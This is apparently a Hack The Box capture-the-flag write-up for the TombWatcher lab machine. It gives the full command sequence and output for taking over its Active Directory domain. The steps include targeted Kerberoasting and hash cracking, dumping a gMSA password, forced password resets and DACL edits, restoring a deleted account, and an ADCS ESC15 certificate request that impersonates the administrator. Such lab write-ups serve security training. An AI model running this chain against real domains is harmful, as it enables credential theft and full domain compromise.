🧟TombWatcher

https://app.hackthebox.com/machines/664

Machine Information

As is common in real life Windows pentests, you will start the TombWatcher box with credentials for the following account: henry / H3nry_987TGV!

Recon

We start the basic recon

change <ip>

[*] Running initial Nmap scan...
sudo nmap -sCV -T4 <ip> -oA nmap-initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 11:14 CEST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
[..]
Not shown: 987 filtered tcp ports (no-response)   
PORT     STATE SERVICE       VERSION             
53/tcp   open  domain        Simple DNS Plus                                                                          
80/tcp   open  http          Microsoft IIS httpd 10.0  
| http-methods:                                                                                                       
|_  Potentially risky methods: TRACE        
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-08 13:14:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T13:15:59+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59                                                                               
|_Not valid after:  2025-11-16T00:47:59                  
445/tcp  open  microsoft-ds?                           
464/tcp  open  kpasswd5?                                                                                              
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-08T13:15:59+00:00; +4h00m01s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-08T13:15:59+00:00; +4h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: tombwatcher.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.tombwatcher.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.tombwatcher.htb
| Not valid before: 2024-11-16T00:47:59
|_Not valid after:  2025-11-16T00:47:59
|_ssl-date: 2025-06-08T13:15:59+00:00; +4h00m01s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

/etc/krb5.conf #change <ip>

[libdefaults]
    default_realm = tombwatcher.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    ticket_lifetime = 24h
    forwardable = true
    renewable = true

[realms]
    tombwatcher.HTB = {
        kdc = <ip>
        admin_server = <ip>
    }

[domain_realm]
    .tombwatcher.htb = TOMBWATCHER.HTB
    tombwatcher.htb = TOMBWATCHER.HTB
    dc01.tombwatcher.htb = TOMBWATCHER.HTB 

/etc/hosts #change <ip>

<ip> tombwatcher.htb
<ip> DC01.tombwatcher.htb

Website

The website is just a default IEE-Server

Active Directory

We gonna check the permission of the given User in the AD

User

change <ip>

➜ bloodhound-python -u 'henry' -p 'H3nry_987TGV!' -d tombwatcher.htb -dc DC01.TOMBWATCHER.HTB -c All -o bloodhound_results.json -ns <ip>
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: tombwatcher.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC01.TOMBWATCHER.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.TOMBWATCHER.HTB
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.tombwatcher.htb
INFO: Done in 00M 05S

So let's download targetedKerberoast

➜ git clone https://github.com/ShutdownRepo/targetedKerberoast
Cloning into 'targetedKerberoast'...                  
remote: Enumerating objects: 76, done.       
remote: Counting objects: 100% (33/33), done.
remote: Compressing objects: 100% (19/19), done.                                                                                                                                                                                            remote: Total 76 (delta 19), reused 18 (delta 14), pack-reused 43 (from 1)                                                                                                                                                                  Receiving objects: 100% (76/76), 252.27 KiB | 4.35 MiB/s, done.                                                                                                                                                                             Resolving deltas: 100% (30/30), done.  

cchange <ip>

➜ sudo ntpdate <ip>
[sudo] password for kali: 
2025-06-08 17:44:25.742639 (+0200) +14400.668904 +/- 0.010066 [machineip] s1 no-leap
CLOCK: time stepped by 14400.668904
➜ tombwatcher ./targetedKerberoast/targetedKerberoast.py -v -d tombwatcher.htb -u henry -p 'H3nry_987TGV!'

[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (Alfred)
[+] Printing hash for (Alfred)
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$5d2a12c93078b0b0caa61064c24a1898$43b171a93dd0ee6030e26e7472bb0b029a9c6b614809b400edfccdb8e09ccd5e60f20e3b5192dac2f9dcae64af3bf7acad9ea679297bd61c1aa9613c87ecc662b1fefa68ec81c380022882fcf9a0645fdd5bf6c2e2a26b9c906de9583f9cd0959531b513bdb5529b45c52b9ef48f8534a6a3e6ad6eee8d420e0fa7671fcefedeae6c2aad48083d0213602d1322fe5132c1418b47a6155dec82cd636fd638647129db48aff380247212a0e92c3aba8de7349e8787e530b2380d7c110bceebb7aad9cfe80cf3b02dc2322f592c4da69a59572f086990dfe44943f74349237dd7a07a442777ec562e54747053730280b5b9341c02a1b24bb7373702f14792ebbb1e7360bf102b4e11397ed4dd79851a1fde5f0d0e117db53c3f5251493d8f376c138ee0417dbebd93bc26183317407b8d7cce4aa3788abae93a4a227219c6a7535ef09c91fb20e5ce53f8c9f5a886fcfeb2221553d59bccbf4db0850a47e00f3045acdf107019d80f8713a13c43815103416253ddc711e46feba6d5a64f87cf7d0a45f12f47c0a574bdf367e7cc3f2f8e9f2e769dd135a47f9cc928f2f67f6fdf505fc982de61e69e8c2d89ee822a272c80e8b9d782f37883c189f89f7141cebfba67c7529829a88175719fabeb64b9c8156647619f22e15fa2357c7f5c84e3938be7f6b6d0a031272ab6a87ed3de5af94c636c09be547e89494241b52bf55c2d4f1822e5cdd5fd90333c8725102267d68384be2e4c0597ca920cf9f1f74fefcdbbf6dafdf31fde3cf83bd70689ff0cfb33aa0fa57bd28efafc62cf7dcb0702740bfe4dafa7ce22d84beb522d0a86b0db74a8c2396a7e84bbe6ef1d00b208167efb1e39b6caac0d3c4b4016daea4558016a71b22788b72f0c7e60d29ad901d6fe01555b5620988c21252ae7e46ad946a2d114ed886ed2d1c4e49a02489200ae4882dcf4668b2a878995a5c3f9c8ea859ab5ccff8303b2ef02bbf331ea37c513ab86ccda86fa973b7a0f58eda9a01ffc11b9dea7c830ebbdcebf61258da17c47f8dfd0b8dd7cd652de58b3129db1a931047fc0edeb05be43fb3e20e01dedda724ce434959a5f572a9e6e7e419b67c919986446c7dbb53b464bbc8d423e98d703b0ccafcf757113b4bd60bb8dea0cac448d20450732d826549394d47b830819e7133623998359a71c439317506f60604ebf29074d7f02fd155b1d7dc91b96bf9aa844113729e527f00142a493f4e04a536e4a787e17bd527757ac911e57c26d47635c9dbda8e5f9140063b454a087e9bfb857c37279fd30d62c02625ae2fd546097b509e912bf742e202aa9b089f09f55cc4c042df8c985d530fdb086064dd670c624008ccaeaf42e478082dd8d7f10a68d9021088920908ecde8d24fee680e0404df9722677b8452417de9c6f065883d48d29ea755a8aa78b7c93608b3296cdb4b56a920a81ee6b0d45b8bdc9d7466a2445cc3fa7d297d
[VERBOSE] SPN removed successfully for (Alfred)

We gonna crack that hash

➜ hashcat --identify alfred.hash            
The following hash-mode match the structure of your input hash:                
                                                           
      # | Name                                                       | Category
  ======+============================================================+======================================
  13100 | Kerberos 5, etype 23, TGS-REP                              | Network Protocol
                                                           
➜ hashcat -m 13100 alfred.hash /usr/share/wordlists/rockyou.txt                                            
hashcat (v6.2.6) starting                                                                                             
[...]
$krb5tgs$23$*Alfred$TOMBWATCHER.HTB$tombwatcher.htb/Alfred*$5d2a12c93078b0b0caa61064c24a1898$43b171a93dd0ee6030e26e7472bb0b029a9c6b614809b400edfccdb8e09ccd5e60f20e3b5192dac2f9dcae64af3bf7acad9ea679297bd61c1aa9613c87ecc662b1fefa68ec81c38
0022882fcf9a0645fdd5bf6c2e2a26b9c906de9583f9cd0959531b513bdb5529b45c52b9ef48f8534a6a3e6ad6eee8d420e0fa7671fcefedeae6c2aad48083d0213602d1322fe5132c1418b47a6155dec82cd636fd638647129db48aff380247212a0e92c3aba8de7349e8787e530b2380d7c110bcee
bb7aad9cfe80cf3b02dc2322f592c4da69a59572f086990dfe44943f74349237dd7a07a442777ec562e54747053730280b5b9341c02a1b24bb7373702f14792ebbb1e7360bf102b4e11397ed4dd79851a1fde5f0d0e117db53c3f5251493d8f376c138ee0417dbebd93bc26183317407b8d7cce4aa37
88abae93a4a227219c6a7535ef09c91fb20e5ce53f8c9f5a886fcfeb2221553d59bccbf4db0850a47e00f3045acdf107019d80f8713a13c43815103416253ddc711e46feba6d5a64f87cf7d0a45f12f47c0a574bdf367e7cc3f2f8e9f2e769dd135a47f9cc928f2f67f6fdf505fc982de61e69e8c2d8
9ee822a272c80e8b9d782f37883c189f89f7141cebfba67c7529829a88175719fabeb64b9c8156647619f22e15fa2357c7f5c84e3938be7f6b6d0a031272ab6a87ed3de5af94c636c09be547e89494241b52bf55c2d4f1822e5cdd5fd90333c8725102267d68384be2e4c0597ca920cf9f1f74fefcdb
bf6dafdf31fde3cf83bd70689ff0cfb33aa0fa57bd28efafc62cf7dcb0702740bfe4dafa7ce22d84beb522d0a86b0db74a8c2396a7e84bbe6ef1d00b208167efb1e39b6caac0d3c4b4016daea4558016a71b22788b72f0c7e60d29ad901d6fe01555b5620988c21252ae7e46ad946a2d114ed886ed2d
1c4e49a02489200ae4882dcf4668b2a878995a5c3f9c8ea859ab5ccff8303b2ef02bbf331ea37c513ab86ccda86fa973b7a0f58eda9a01ffc11b9dea7c830ebbdcebf61258da17c47f8dfd0b8dd7cd652de58b3129db1a931047fc0edeb05be43fb3e20e01dedda724ce434959a5f572a9e6e7e419b6
7c919986446c7dbb53b464bbc8d423e98d703b0ccafcf757113b4bd60bb8dea0cac448d20450732d826549394d47b830819e7133623998359a71c439317506f60604ebf29074d7f02fd155b1d7dc91b96bf9aa844113729e527f00142a493f4e04a536e4a787e17bd527757ac911e57c26d47635c9db
da8e5f9140063b454a087e9bfb857c37279fd30d62c02625ae2fd546097b509e912bf742e202aa9b089f09f55cc4c042df8c985d530fdb086064dd670c624008ccaeaf42e478082dd8d7f10a68d9021088920908ecde8d24fee680e0404df9722677b8452417de9c6f065883d48d29ea755a8aa78b7c
93608b3296cdb4b56a920a81ee6b0d45b8bdc9d7466a2445cc3fa7d297d:basketball
[...]                                                          

➜ bloodyAD -u Alfred -p basketball -d tombwatcher.htb --host DC01.tombwatcher.htb add groupMember INFRASTRUCTURE Alfred 
[+] Alfred added to INFRASTRUCTURE

We gonna dump the gMSA password,

change <ip>

➜ bloodyAD -u Alfred -p basketball -d tombwatcher.htb --host DC01.tombwatcher.htb add groupMember INFRASTRUCTURE Alfred                    
[+] Alfred added to INFRASTRUCTURE
➜ python3 gMSADumper/gMSADumper.py -u 'alfred' -p 'basketball' -d 'tombwatcher.htb'                                    
Users or groups who can read password for ansible_dev$:
 > Infrastructure
ansible_dev$:::1c37d00093dc2a5f25176bf2d474afdc
ansible_dev$:aes256-cts-hmac-sha1-96:526688ad2b7ead7566b70184c518ef665cc4c0215a1d634ef5f5bcda6543b5b3
ansible_dev$:aes128-cts-hmac-sha1-96:91366223f82cd8d39b0e767f0061fd9a
➜ bloodyAD -u 'ansible_dev$' -p ':1c37d00093dc2a5f25176bf2d474afdc' -d tombwatcher.htb --dc-ip <ip> set password sam 'Pass123!'
[+] Password changed successfully!
➜ impacket-owneredit -action write -target 'john' -new-owner 'sam' 'tombwatcher.htb'/'sam':'Pass123!' -dc-ip <ip>                                                    

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!
➜ impacket-dacledit -action write -rights FullControl -principal "sam" -target-dn "CN=john,CN=Users,DC=tombwatcher,DC=htb" 'tombwatcher.htb/sam:Pass123!' -dc-ip <ip>
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250608-141106.bak
[*] DACL modified successfully!
➜ bloodyAD -d tombwatcher.htb -u 'sam' -p 'Pass123!' --dc-ip <ip> set password john 'NewPa$$word'
[+] Password changed successfully!

change <ip>

➜ evil-winrm -i <ip> -u 'john' -p 'NewPa$$word'                                                                 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> type ..\Desktop\user.txt
4d84123d110faa4b4001be472529ae71

Root

ESC15

*Evil-WinRM* PS C:\Users\john\Documents> Get-ADObject -Filter 'isDeleted -eq $true' -IncludeDeletedObjects


Deleted           : True
DistinguishedName : CN=Deleted Objects,DC=tombwatcher,DC=htb
Name              : Deleted Objects
ObjectClass       : container
ObjectGUID        : 34509cb3-2b23-417b-8b98-13f0bd953319

Deleted           : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name              : cert_admin
                    DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass       : user
ObjectGUID        : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3

Deleted           : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name              : cert_admin
                    DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass       : user
ObjectGUID        : c1f1f0fe-df9c-494c-bf05-0679e181b358

Deleted           : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name              : cert_admin
                    DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass       : user
ObjectGUID        : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents> Restore-ADObject -Identity 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
*Evil-WinRM* PS C:\Users\john\Documents> Enable-ADAccount -Identity cert_admin
*Evil-WinRM* PS C:\Users\john\Documents> Set-ADAccountPassword -Identity cert_admin -Reset -NewPassword (ConvertTo-SecureString "P@ssword123!" -AsPlainText -Force)

change <ip>

➜ certipy-ad find -u cert_admin@tombwatcher.htb -p 'P@ssword123!' -dc-ip <ip> -vulnerable 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250608141722_Certipy.txt'
[*] Wrote text output to '20250608141722_Certipy.txt'
[*] Saving JSON output to '20250608141722_Certipy.json'
[*] Wrote JSON output to '20250608141722_Certipy.json'

change <ip>

➜ certipy-ad req -dc-ip <ip> -ca 'tombwatcher-CA-1' -target-ip <ip> -u cert_admin@tombwatcher.htb -p 'P@ssword123!' -template WebServer -upn administrator@tombwatcher.htb -application-policies 'Client Authentication'
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

change <ip>

➜ certipy-ad auth -pfx administrator.pfx -dc-ip <ip> -domain tombwatcher.htb -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@tombwatcher.htb'
[*] Connecting to 'ldaps://[machineip]:636'
[*] Authenticated to '[machineip]' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands

# change_password administrator Password@123
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: Password@123
Password changed successfully!

change <ip>

➜ evil-winrm -i <ip> -u administrator -p Password@123
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
caf1c29390c8488c92c6a94ef973247d